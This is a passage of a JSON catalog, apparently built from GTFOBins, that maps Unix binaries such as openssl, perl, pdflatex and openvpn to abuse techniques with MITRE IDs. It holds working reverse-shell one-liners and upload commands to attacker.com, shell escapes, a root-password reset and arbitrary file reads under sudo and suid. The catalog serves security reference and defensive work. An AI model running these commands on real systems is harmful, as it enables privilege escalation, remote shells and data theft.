2>&1 | openssl s_client -quiet -connect attacker.com:12345 >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:reverse-shell:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\n/bin/sh -i </path/to/temp-socket 2>&1 | openssl s_client -quiet -connect attacker.com:12345 >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:upload:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"openssl s_client -quiet -connect attacker.com:12345 </path/to/input-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:upload:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"openssl s_client -quiet -connect attacker.com:12345 </path/to/input-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:upload:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"openssl s_client -quiet -connect attacker.com:12345 </path/to/input-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openvpn:file-read:0:sudo","toolId":"gtfo:openvpn","toolName":"openvpn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"openvpn --config /path/to/input-file","description":"The file is actually parsed and the first partial wrong line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openvpn/"]},{"id":"gtfo:openvpn:file-read:0:suid","toolId":"gtfo:openvpn","toolName":"openvpn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"openvpn --config /path/to/input-file","description":"The file is actually parsed and the first partial wrong line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openvpn/"]},{"id":"gtfo:openvpn:file-read:0:unprivileged","toolId":"gtfo:openvpn","toolName":"openvpn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"openvpn --config /path/to/input-file","description":"The file is actually parsed and the first partial wrong line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openvpn/"]},{"id":"gtfo:openvpn:shell:0:sudo","toolId":"gtfo:openvpn","toolName":"openvpn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"openvpn --dev null --script-security 2 --up '/bin/sh -s'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openvpn/"]},{"id":"gtfo:openvpn:shell:0:suid","toolId":"gtfo:openvpn","toolName":"openvpn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"openvpn --dev null --script-security 2 --up '/bin/sh -p -s'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openvpn/"]},{"id":"gtfo:openvpn:shell:0:unprivileged","toolId":"gtfo:openvpn","toolName":"openvpn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"openvpn --dev null --script-security 2 --up '/bin/sh -s'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openvpn/"]},{"id":"gtfo:openvt:command:0:sudo","toolId":"gtfo:openvt","toolName":"openvt","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"openvt -- /path/to/command","description":"The command execution is displayed on the virtual console.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openvt/"]},{"id":"gtfo:opkg:shell:0:sudo","toolId":"gtfo:opkg","toolName":"opkg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm opkg install x_1.0_all.deb","description":"Generate the Debian package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho 'exec /bin/sh' >x.sh\nfpm -n x -s dir -t deb -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/opkg/"]},{"id":"gtfo:pandoc:file-read:0:sudo","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pandoc -t plain /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:pandoc:file-read:0:suid","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pandoc -t plain /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:pandoc:file-read:0:unprivileged","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pandoc -t plain /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:pandoc:file-write:0:sudo","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | pandoc -t plain -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:pandoc:file-write:0:suid","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | pandoc -t plain -o /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:pandoc:file-write:0:unprivileged","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | pandoc -t plain -o /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:pandoc:inherit:0:sudo","toolId":"gtfo:pandoc","toolName":"pandoc","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\npandoc -L /path/to/temp-file /dev/null","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:pandoc:inherit:0:suid","toolId":"gtfo:pandoc","toolName":"pandoc","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\npandoc -L /path/to/temp-file /dev/null","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:pandoc:inherit:0:unprivileged","toolId":"gtfo:pandoc","toolName":"pandoc","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\npandoc -L /path/to/temp-file /dev/null","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:passwd:privilege-escalation:0:sudo","toolId":"gtfo:passwd","toolName":"passwd","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"echo -e 'x\\nx' | passwd","description":"This changes the root password to `x`, so it's now possible to log in using, for example, `su`.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/passwd/"]},{"id":"gtfo:paste:file-read:0:sudo","toolId":"gtfo:paste","toolName":"paste","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"paste /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/paste/"]},{"id":"gtfo:paste:file-read:0:suid","toolId":"gtfo:paste","toolName":"paste","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"paste /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/paste/"]},{"id":"gtfo:paste:file-read:0:unprivileged","toolId":"gtfo:paste","toolName":"paste","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"paste /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/paste/"]},{"id":"gtfo:pax:file-read:0:sudo","toolId":"gtfo:pax","toolName":"pax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pax -w /path/to/input-file | tar -xO","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pax/"]},{"id":"gtfo:pax:file-read:0:suid","toolId":"gtfo:pax","toolName":"pax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pax -w /path/to/input-file | tar -xO","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pax/"]},{"id":"gtfo:pax:file-read:0:unprivileged","toolId":"gtfo:pax","toolName":"pax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pax -w /path/to/input-file | tar -xO","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pax/"]},{"id":"gtfo:pdb:inherit:0:sudo","toolId":"gtfo:pdb","toolName":"pdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/temp-file\npdb /path/to/temp-file\ncont","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdb/"]},{"id":"gtfo:pdb:inherit:0:unprivileged","toolId":"gtfo:pdb","toolName":"pdb","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/temp-file\npdb /path/to/temp-file\ncont","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdb/"]},{"id":"gtfo:pdflatex:file-read:0:sudo","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\npdftotext texput.pdf -","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdflatex:file-read:0:suid","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\npdftotext texput.pdf -","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdflatex:file-read:0:unprivileged","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\npdftotext texput.pdf -","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdflatex:file-write:0:sudo","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"pdflatex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdflatex:file-write:0:suid","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"pdflatex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdflatex:file-write:0:unprivileged","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"pdflatex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdflatex:shell:0:sudo","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdflatex:shell:0:suid","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdflatex:shell:0:unprivileged","toolId":"gtfo:pdflatex","toolName":"pdflatex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdflatex/"]},{"id":"gtfo:pdftex:shell:0:sudo","toolId":"gtfo:pdftex","toolName":"pdftex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pdftex --shell-escape '\\write18{/bin/sh}\\end'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pdftex/"]},{"id":"gtfo:pdftex:shell:0:suid","toolId":"gtfo:pdftex","toolName":"pdftex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pdftex --shell-escape '\\write18{/bin/sh}\\end'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pdftex/"]},{"id":"gtfo:pdftex:shell:0:unprivileged","toolId":"gtfo:pdftex","toolName":"pdftex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pdftex --shell-escape '\\write18{/bin/sh}\\end'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pdftex/"]},{"id":"gtfo:perf:shell:0:sudo","toolId":"gtfo:perf","toolName":"perf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perf stat /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perf/"]},{"id":"gtfo:perf:shell:0:suid","toolId":"gtfo:perf","toolName":"perf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perf stat /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/perf/"]},{"id":"gtfo:perf:shell:0:unprivileged","toolId":"gtfo:perf","toolName":"perf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"perf stat /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perf/"]},{"id":"gtfo:perl:download:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"perl -MIO::Socket::INET -e '$s=new IO::Socket::INET(PeerAddr=>\"attacker.com\",PeerPort=>80,Proto=>\"tcp\") or die; print $s \"GET /path/to/input-file HTTP/1.1\\r\\nHost: attacker.com\\r\\nMetadata: true\\r\\nConnection: close\\r\\n\\r\\n\"; open(my $fh, \">\", \"/path/to/output-file\") or die; $in_content = 0; while (<$s>) { if ($in_content) { print $fh $_; } elsif ($_ eq \"\\r\\n\") { $in_content = 1; } } close($s); close($fh);'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:download:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"perl -MIO::Socket::INET -e '$s=new IO::Socket::INET(PeerAddr=>\"attacker.com\",PeerPort=>80,Proto=>\"tcp\") or die; print $s \"GET /path/to/input-file HTTP/1.1\\r\\nHost: attacker.com\\r\\nMetadata: true\\r\\nConnection: close\\r\\n\\r\\n\"; open(my $fh, \">\", \"/path/to/output-file\") or die; $in_content = 0; while (<$s>) { if ($in_content) { print $fh $_; } elsif ($_ eq \"\\r\\n\") { $in_content = 1; } } close($s); close($fh);'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:file-read:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"perl -ne print /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:file-read:0:suid","toolId":"gtfo:perl","toolName":"perl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"perl -ne print /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:file-read:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"perl -ne print /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:reverse-shell:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"perl -e 'use Socket;$i=\"attacker.com\";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:reverse-shell:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"perl -e 'use Socket;$i=\"attacker.com\";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:shell:0:capabilities","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:shell:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perl -e 'exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:shell:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"perl -e 'exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:shell:1:sudo","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"PERL5OPT=-d PERL5DB='exec \"/bin/sh\"' perl /dev/null","description":"The `/dev/null` part can be omitted, just use `Ctrl-D` in order to spawn the shell.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:shell:1:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"PERL5OPT=-d PERL5DB='exec \"/bin/sh\"' perl /dev/null","description":"The `/dev/null` part can be omitted, just use `Ctrl-D` in order to spawn the shell.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:upload:0:sudo","toolId":"gtfo:perl","toolName":"perl","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"perl -MIO::Socket::INET -e '$s = new IO::Socket::INET(PeerAddr=>\"attacker.com\", PeerPort=>80, Proto=>\"tcp\") or die;open(my $file, \"<\", \"/path/to/input-file\") or die;$content = join(\"\", <$file>);close($file);$headers = \"POST / HTTP/1.1\\r\\nHost: attacker.com\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \" . length($content) . \"\\r\\nConnection: close\\r\\n\\r\\n\";print $s $headers . $content;while (<$s>) { }close($s);'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perl:upload:0:unprivileged","toolId":"gtfo:perl","toolName":"perl","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"perl -MIO::Socket::INET -e '$s = new IO::Socket::INET(PeerAddr=>\"attacker.com\", PeerPort=>80, Proto=>\"tcp\") or die;open(my $file, \"<\", \"/path/to/input-file\") or die;$content = join(\"\", <$file>);close($file);$headers = \"POST / HTTP/1.1\\r\\nHost: attacker.com\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \" . length($content) . \"\\r\\nConnection: close\\r\\n\\r\\n\";print $s $headers . $content;while (<$s>) { }close($s);'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perl/"]},{"id":"gtfo:perlbug:shell:0:sudo","toolId":"gtfo:perlbug","toolName":"perlbug","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh #'","description":"This requires to press `Enter` serveral times before the shell is spawn.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/perlbug/"]},{"id":"gtfo:perlbug:shell:0:unprivileged","toolId":"gtfo:perlbug","toolName":"perlbug","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh #'","description":"This requires to press `Enter` serveral times before the shell is spawn.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/perlbug/"]},{"id":"gtfo:pexec:shell:0:sudo","toolId":"gtfo:pexec","toolName":"pexec","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pexec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pexec/"]},{"id":"gtfo:pexec:shell:0:suid","toolId":"gtfo:pexec","toolName":"pexec","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pexec /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pexec/"]},{"id":"gtfo:pexec:shell:0:unprivileged","toolId":"gtfo:pexec","toolName":"pexec","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pexec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pexec/"]},{"id":"gtfo:pg:file-read:0:sudo","toolId":"gtfo:pg","toolName":"pg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pg /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pg/"]},{"id":"gtfo:pg:file-read:0:suid","toolId":"gtfo:pg","toolName":"pg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege 